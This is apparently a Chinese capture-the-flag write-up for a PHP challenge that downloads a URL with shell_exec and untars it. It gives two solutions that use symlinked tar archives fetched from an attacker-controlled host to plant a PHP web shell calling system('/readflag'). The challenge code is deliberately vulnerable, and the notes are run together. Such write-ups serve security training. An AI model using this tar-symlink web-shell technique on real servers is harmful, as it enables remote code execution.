<?php
$sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);
echo $sandbox."</br>";
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET["url"]) && !preg_match('/^(http|https):\/\/.*/', $_GET["url"]))
die();
$url = str_replace("|", "", $_GET["url"]);
$data = shell_exec("GET " . escapeshellarg($url));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
shell_exec("UNTAR ".escapeshellarg(basename($info["basename"])));
highlight_file(__FILE__); 两个原题拼的
https://lihuaiqiu.github.io/2019/07/13/BUUCTF-Writeup-%E4%B8%80/
https://www.anquanke.com/post/id/86987
http://knqyf263.hatenablog.com/entry/2018/06/27/181037
http://ip:port/?url=http://xxxxxxxxxxx/cmd.tar&filename=/abc/cmd.tar
生成的 shell 在 /sandbox/cmd.php 访问后得 flag
https://lihuaiqiu.github.io/2019/07/13/BUUCTF-Writeup-%E4%B8%80/https://www.anquanke.com/post/id/86987解法一:
ln -s /var/www/html/sandbox/xb1700.php xbox
tar -cf 3.tar
echo '<?php echo system("/readflag");' >xbox
tar -rf 3.tar xbox
/?url=http://xxx/xbox.tar&filename=xbox.tarhttp://knqyf263.hatenablog.com/entry/2018/06/27/181037解法二:
ln -s /var/www/html/sandbox/cmd.php cmd.php
cat <<EOF > foo
<?php system("/readflag");
EOF
tar cvf cmd.tar * --transform='s/foo/cmd.php/g'
tar -tvvf cmd.tarhttp://ip:port/?url=http://xxxxxxxxxxx/cmd.tar&filename=/abc/cmd.tar生成的 shell 在 /sandbox/cmd.php 访问后得 flag
